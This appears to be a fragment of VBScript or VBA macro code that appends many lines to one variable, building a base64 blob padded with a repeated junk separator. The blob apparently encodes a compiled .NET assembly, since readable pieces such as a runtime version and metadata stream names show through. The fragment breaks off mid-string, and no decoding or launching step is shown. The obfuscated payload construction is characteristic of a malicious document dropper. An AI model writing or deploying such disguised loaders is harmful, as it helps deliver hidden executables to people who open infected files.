RNhrp = RNhrp & "&^%^#%@@&&^%^#%4If///xEEewk@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%QRBhEKI@@&&^%^#%@@&&^%^#%w"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%fQChp@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%GEw0gIg@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%Dj+/v//EQ061/3//y@@&&^%^#%I"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%OO3+"
RNhrp = RNhrp & "//8XEwwgDQ@@&&^%^#%@@&&^%^#%@@&&^%^#%Djg"
RNhrp = RNhrp & "/v//c1s@@&&^%^#%@@&&^%^#%@@&&^%^#%p6BBEF"
RNhrp = RNhrp & "HyjWKHk@@&&^%^#%@@&&^%^#%@@&&^%^#%YTEDhD"
RNhrp = RNhrp & "/v//Ji@@&&^%^#%Y@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%KHI@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%Y6uP7//yYREhERPlQC@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%gI@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%Dik/v//ERQ5@@&&^%^#%P3//y@@&&^%^#%s"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%OJP+"
RNhrp = RNhrp & "//9zWw@@&&^%^#%@@&&^%^#%CnoEEQUfUNYoeQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%BhMKI@@&&^%^#%w@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%4dv7//wQRBR80"
RNhrp = RNhrp & "1ih5@@&&^%^#%@@&&^%^#%@@&&^%^#%GEwYgEg@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%Dhf/v//EQ0ofQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%BhMPICM@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%4TP7//xEEewk@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%QRCB7WEQ8aEgEoZw@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%BjpY////I@@&&^%^#%E@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%4KP7//wQRFREW"
RNhrp = RNhrp & "FhEWjmkof@@&&^%^#%@@&&^%^#%@@&&^%^#%Bi@@"
RNhrp = RNhrp & "&&^%^#%Z@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%O@@&&^%^#%/+//9zWw@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "CnoRBHsK@@&&^%^#%@@&&^%^#%@@&&^%^#%EEQco"
RNhrp = RNhrp & "Yw@@&&^%^#%@@&&^%^#%Bjq5@@&&^%^#%Q@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%IC0@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%47P3//yCz@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%jQM@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%ETBy@@&&^%^#%o@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%FzrV/f//JhEEewk@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%QRDRET1hEWERaOaRIBKGc@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%Y6Gfz//y@@&&^%"
RNhrp = RNhrp & "^#%E@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "OKz9//9zWw@@&&^%^#%@@&&^%^#%CnoRBhEJQBD/"
RNhrp = RNhrp & "//8gHQ@@&&^%^#%@@&&^%^#%@@&&^%^#%Bc6kv3/"
RNhrp = RNhrp & "/yYEEQ4fENYoeQ@@&&^%^#%@@&&^%^#%BhMUIBU@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%4ev3/"
RNhrp = RNhrp & "/xEHHywRDREQ1p4gJQ@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%BY5Zf3//yYoeg@@&&^%^#%@@&&^%^#%Bhp@"
RNhrp = RNhrp & "@&&^%^#%Jg@@&&^%^#%@@&&^%^#%@@&&^%^#%C@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%KHI@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%Y6Sv3//yYREhfWExIgHg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%Dg5/f//c1s@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%p6EQR7Cg@@&&^%^#%@@&&^%^#%BBEHKGU@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%Y6KPz//y@@&&^%"
RNhrp = RNhrp & "^#%p@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "FjkV/f//JgIIflw@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%p+X@@&&^%^#%@@&&^%^#%@@&&^%^#%ChYaflw@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%oUEgMSBChh@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%GOh@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%gCw@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%Djo/P//c1s@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%p6BB88KHk@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%YTBS@@&&^%^#%K@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%OM78//8RBHsK@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%EEQcoZ@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%BjrD+///ICo@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%4sfz//wQRDh8U1ih5"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%GExUgEw@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%Dia/P//BBEFHNYoew@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%BhfaExEgEQ@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%DiC/P//EQR7Cg@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%BBEHKGI@@&&^%^#%@@&&^%^#%@@&&^%^#%Y6"
RNhrp = RNhrp & "Mg@@&&^%^#%@@&&^%^#%@@&&^%^#%C@@&&^%^#%P"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%KHI@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%Y6YPz//yY4o/3/"
RNhrp = RNhrp & "/wQRDh8M1ih5@@&&^%^#%@@&&^%^#%@@&&^%^#%G"
RNhrp = RNhrp & "ExMgGw@@&&^%^#%@@&&^%^#%@@&&^%^#%DhD/P//"
RNhrp = RNhrp & "c1s@@&&^%^#%@@&&^%^#%@@&&^%^#%p6EQcfKZQT"
RNhrp = RNhrp & "CC@@&&^%^#%r@@&&^%^#%@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%OCz8//9zWw@@&&^%^#%@@&&^%^#%Cnrd"
RNhrp = RNhrp & "Lg@@&&^%^#%@@&&^%^#%@@&&^%^#%Ch+@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%GEQR7Cw@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%BIQofw@@&&^%^#%@@&&^%^#%BhMXERc5Bw@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%BEXKI@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%YWCiiB@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%G3cg@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%XCi@@&&^%^#%I@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%OCw@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%S@@&&^%^#%/4V"
RNhrp = RNhrp & "Dg@@&&^%^#%@@&&^%^#%@@&&^%^#%i@@&&^%^#%F"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%OBo@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%S@@&&"
RNhrp = RNhrp & "^%^#%xZ9G@@&&^%^#%@@&&^%^#%@@&&^%^#%BDg2"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&"
RNhrp = RNhrp & "&^%^#%Y@@&&^%^#%@@&&^%^#%@@&&^%^#%D+Dhk@"
RNhrp = RNhrp & "@&&^%^#%/gwZ@@&&^%^#%EUJ@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%Eg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%L3///+9+f//vf///w@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%BJ@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%Mw@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%Kv///9n@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%O@@&&^%^#%0@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%mI@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%WOcb/"
RNhrp = RNhrp & "//8mEgPQDg@@&&^%^#%@@&&^%^#%@@&&^%^#%ih1"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%GKHY@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%a4fQ0@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%Qg@@&&^%^#%g@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%Dik////csQF@@&&^%^#%H@@&&^%^#%C"
RNhrp = RNhrp & "KHQ@@&&^%^#%@@&&^%^#%@@&&^%^#%YMI@@&&^%^"
RNhrp = RNhrp & "#%c@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%4"
RNhrp = RNhrp & "jv///xIE/hUN@@&&^%^#%@@&&^%^#%@@&&^%^#%C"
RNhrp = RNhrp & "Fihy@@&&^%^#%@@&&^%^#%@@&&^%^#%GOan///8m"
RNhrp = RNhrp & "I@@&&^%^#%E@@&&^%^#%@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%4cP///wYq@@&&^%^#%@@&&^%^#%BBH@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%4@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%C0BQ@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%wgU@@&&^%^#%@@&&^%^#%C4@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%l@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%BOisCJhb+CQ@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%KB4@@&&^%^#%@@&&^%^#%@@&&^%^#%oq@@&&"
RNhrp = RNhrp & "^%^#%Eor@@&&^%^#%iYW/gk@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%P4J@@&&^%^#%QBvXQ@@&&^%^#%@@&&^%^#%Cio@"
RNhrp = RNhrp & "@&&^%^#%TisCJhY@@&&^%^#%/gk@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%P4J@@&&^%^#%Q@@&&^%^#%oTw@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%Cio6KwImFv4J@@&&^%^#%@@&&^%^#%Bv"
RNhrp = RNhrp & "Xg@@&&^%^#%@@&&^%^#%Cio@@&&^%^#%bisCJhY@"
RNhrp = RNhrp & "@&&^%^#%/gk@@&&^%^#%@@&&^%^#%P4J@@&&^%^#"
RNhrp = RNhrp & "%QD+CQI@@&&^%^#%/gkD@@&&^%^#%Chs@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%GKhor@@&&^%^#%iYWFyo@"
RNhrp = RNhrp & "@&&^%^#%GisCJhYWKgBOKwImFgD+CQ@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%/gkB@@&&^%^#%Chf@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%KKj4r@@&&^%^#%iYW@@&&^%^#%P4J"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%oH@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%Cio+KwImFgD+CQ@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%KG@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%oqPisCJhY@@&&^%^#%/gk@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%Chh@@&&^%^#%@@&&^%^#%@@&&^%^#%KKl4r"
RNhrp = RNhrp & "@@&&^%^#%iYW@@&&^%^#%P4J@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%D+CQE@@&&^%^#%/gkC@@&&^%^#%ChH@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%KKk4r@@&&^%^#%iYW@@&&"
RNhrp = RNhrp & "^%^#%P4J@@&&^%^#%@@&&^%^#%D+CQE@@&&^%^#%"
RNhrp = RNhrp & "KGI@@&&^%^#%@@&&^%^#%@@&&^%^#%oqLisCJhY@"
RNhrp = RNhrp & "@&&^%^#%KGM@@&&^%^#%@@&&^%^#%@@&&^%^#%oq"
RNhrp = RNhrp & "TisCJhY@@&&^%^#%/gk@@&&^%^#%@@&&^%^#%P4J"
RNhrp = RNhrp & "@@&&^%^#%Q@@&&^%^#%oZ@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%Cip+KwImFgD+CQ@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "/gkB@@&&^%^#%P4J@@&&^%^#%gD+CQM@@&&^%^#%"
RNhrp = RNhrp & "/gkE@@&&^%^#%Chl@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%KKj4r@@&&^%^#%iYW@@&&^%^#%P4J@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%oZg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "Cio+KwImFgD+CQ@@&&^%^#%@@&&^%^#%KEk@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%oqPisCJhY@@&&^%^#%"
RNhrp = RNhrp & "/gk@@&&^%^#%@@&&^%^#%Chn@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%KKjor@@&&^%^#%iYW/gk@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%G9o@@&&^%^#%@@&&^%^#%@@&&^%^#%K"
RNhrp = RNhrp & "Kg@@&&^%^#%uKwImFg@@&&^%^#%oSg@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%CipGKwImFgIDKBM@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%YoF@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "Bio@@&&^%^#%@@&&^%^#%C4r@@&&^%^#%iYW@@&&"
RNhrp = RNhrp & "^%^#%igX@@&&^%^#%@@&&^%^#%@@&&^%^#%GKj4r"
RNhrp = RNhrp & "@@&&^%^#%iYW0@@&&^%^#%Y@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%IoG@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "BiouKwImFgIoGQ@@&&^%^#%@@&&^%^#%BioTM@@&"
RNhrp = RNhrp & "&^%^#%I@@&&^%^#%Hg@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%I@@&&^%^#%@@&&^%^#%BEr@@&&"
RNhrp = RNhrp & "^%^#%iYW@@&&^%^#%owF@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%bOgs@@&&^%^#%@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%o@@&&^%^#%Q@@&&^%^#%@@&&^%^#%Kwo4"
RNhrp = RNhrp & "@@&&^%^#%g@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%IKBio@@&&^%^#%@@&&^%^#%DIr@@&&^%^#"
RNhrp = RNhrp & "%iYW@@&&^%^#%/4VBQ@@&&^%^#%@@&&^%^#%Gyo@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%+KwIm"
RNhrp = RNhrp & "FisCJhYCKBo@@&&^%^#%@@&&^%^#%@@&&^%^#%Yq"
RNhrp = RNhrp & "PisCJhY@@&&^%^#%/gk@@&&^%^#%@@&&^%^#%CgZ"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%KKkor@@&&^%^#"
RNhrp = RNhrp & "%iYW/gk@@&&^%^#%@@&&^%^#%P4J@@&&^%^#%Q@@"
RNhrp = RNhrp & "&&^%^#%oGg@@&&^%^#%@@&&^%^#%Cio@@&&^%^#%"
RNhrp = RNhrp & "GisCJhYXKg@@&&^%^#%aKwImFhYq@@&&^%^#%Dor"
RNhrp = RNhrp & "@@&&^%^#%iYW/gk@@&&^%^#%@@&&^%^#%Cgb@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%KKg@@&&^%^#%+KwIm"
RNhrp = RNhrp & "FgD+CQ@@&&^%^#%@@&&^%^#%KBw@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%oqOisCJhb+CQ@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%KB0@@&&^%^#%@@&&^%^#%@@&&^%^#%oq@@&&"
RNhrp = RNhrp & "^%^#%Dor@@&&^%^#%iYW/gk@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%Cge@@&&^%^#%@@&&^%^#%@@&&^%^#%KKg@@&&^%"
RNhrp = RNhrp & "^#%TM@@&&^%^#%M@@&&^%^#%Lw@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%M@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%BEr@@&&^%^#%iYW@@&&^%^#%nsf@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%Kby@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%oKBowI@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%bOhI@@&&^%^#%@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%o@@&&^%^#%g@@&&^%^#%@@&&^%^#%KwoC"
RNhrp = RNhrp & "ex8@@&&^%^#%@@&&^%^#%@@&&^%^#%oGbyE@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%oGKgBqKwImFisCJhYC"
RNhrp = RNhrp & "KB4@@&&^%^#%@@&&^%^#%@@&&^%^#%oCcyI@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%p9Hw@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%Cio@@&&^%^#%GisCJhYXKg@@&&^%^#%aKwIm"
RNhrp = RNhrp & "FhYq@@&&^%^#%EJTSkIB@@&&^%^#%@@&&^%^#%E@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%w@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%B2NC4wLjMwMzE5@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%U@"
RNhrp = RNhrp & "@&&^%^#%b@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%CgS@@&&^%^#%@@&&^%^#%@@&&^%^#%jfg@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%lBI@@&&^%^#%@@&&^%^#%CQX"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%jU3RyaW5ncw@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%C4KQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%0@@&&^%^#%U@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%CNVUwCILw@@&&^%^#%@@&&^%^#%E@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%@@&&^%^#%CNHVUlE@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%mC8@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%FQG@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%jQmxvYg@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%C@@&&^%^#%@@&&^%^#%@@&&^%^#%B"
RNhrp = RNhrp & "V5WiHQkP@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%E@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%BR@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "Dg@@&&^%^#%@@&&^%^#%@@&&^%^#%B4@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%CB@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%MQ@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%HI@@&&^%^#%@@&&^%^#%@@&&^%^#%BK@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%g@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%Y@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%F@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%CQ@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%o@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%C@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%C@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%o@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%B@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%B@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%E@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%E@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%w@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%U@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%oC@@&&^%^#%Q@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "Bg@@&&^%^#%H@@&&^%^#%Cc@@&&^%^#%BgBW@@&&"
RNhrp = RNhrp & "^%^#%Fs@@&&^%^#%BgBi@@&&^%^#%Fs@@&&^%^#%"
RNhrp = RNhrp & "BgBo@@&&^%^#%Fs@@&&^%^#%BgBw@@&&^%^#%Cc@"
RNhrp = RNhrp & "@&&^%^#%BgCO@@&&^%^#%KI@@&&^%^#%GwC1@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%BgDE@@&&"
RNhrp = RNhrp & "^%^#%Ns@@&&^%^#%BgDt@@&&^%^#%Fs@@&&^%^#%"
RNhrp = RNhrp & "BgD0@@&&^%^#%Ns@@&&^%^#%Bg@@&&^%^#%R@@&&"
RNhrp = RNhrp & "^%^#%ds@@&&^%^#%Bg@@&&^%^#%q@@&&^%^#%ds@"
RNhrp = RNhrp & "@&&^%^#%BgBD@@&&^%^#%ds@@&&^%^#%BgBe@@&&"
RNhrp = RNhrp & "^%^#%ds@@&&^%^#%BgB5@@&&^%^#%Y0BBgCs@@&&"
RNhrp = RNhrp & "^%^#%Y0BBgC6@@&&^%^#%ds@@&&^%^#%BgDX@@&&"
RNhrp = RNhrp & "^%^#%f@@&&^%^#%BBg@@&&^%^#%w@@&&^%^#%ls@"
RNhrp = RNhrp & "@&&^%^#%CgBO@@&&^%^#%l4CCgCp@@&&^%^#%rIC"
RNhrp = RNhrp & "Dg@@&&^%^#%r@@&&^%^#%0MDBgCK@@&&^%^#%1s@"
RNhrp = RNhrp & "@&&^%^#%Cg@@&&^%^#%QBF4CBgDbBFs@@&&^%^#%"
RNhrp = RNhrp & "Bg@@&&^%^#%HBVs@@&&^%^#%BgBIBSc@@&&^%^#%"
RNhrp = RNhrp & "BgDKBVs@@&&^%^#%Cg@@&&^%^#%gBi8GBgDRBuEG"
RNhrp = RNhrp & "BgD/Bts@@&&^%^#%Bg@@&&^%^#%UBy@@&&^%^#%H"
RNhrp = RNhrp & "DgDaB0MDBgB8CIgIBgCYCFs@@&&^%^#%DgCdCKI@"
RNhrp = RNhrp & "@&&^%^#%BgCuCFs@@&&^%^#%DgC4CMIIEgDNCNgI"
RNhrp = RNhrp & "BgD0C@@&&^%^#%IJDg@@&&^%^#%dCaI@@&&^%^#%"
RNhrp = RNhrp & "Bg@@&&^%^#%lCYgIBgBDCVEJBgBbCVEJDgCKCcII"
RNhrp = RNhrp & "DgCfCcIIBgDbCeQJCg@@&&^%^#%sCogCCgCiCqwK"
RNhrp = RNhrp & "zwD0Cg@@&&^%^#%@@&&^%^#%Bg@@&&^%^#%CC1s@"
RNhrp = RNhrp & "@&&^%^#%BgBkC1EJDgCKC6I@@&&^%^#%BgDCDFs@"
RNhrp = RNhrp & "@&&^%^#%BgDbDFs@@&&^%^#%Cg@@&&^%^#%sDYgC"
RNhrp = RNhrp & "CgBrDawKCgC/DawKCgDpDawKBg@@&&^%^#%IDlEJ"
RNhrp = RNhrp & "BgByDlEJBgBXD40BBgDED1s@@&&^%^#%BgD9D1s@"
RNhrp = RNhrp & "@&&^%^#%BgBeEls@@&&^%^#%BgDdElEJBgC9E1s@"
RNhrp = RNhrp & "@&&^%^#%Bg@@&&^%^#%DFFs@@&&^%^#%Bg@@&&^%"
RNhrp = RNhrp & "^#%lFFs@@&&^%^#%Bg@@&&^%^#%2FFs@@&&^%^#%"
RNhrp = RNhrp & "DgCtFcQVDgDcFfUVDg@@&&^%^#%LFvUVBg@@&&^%"
RNhrp = RNhrp & "^#%gFqI@@&&^%^#%Cg@@&&^%^#%4FqwKCgBQFogC"
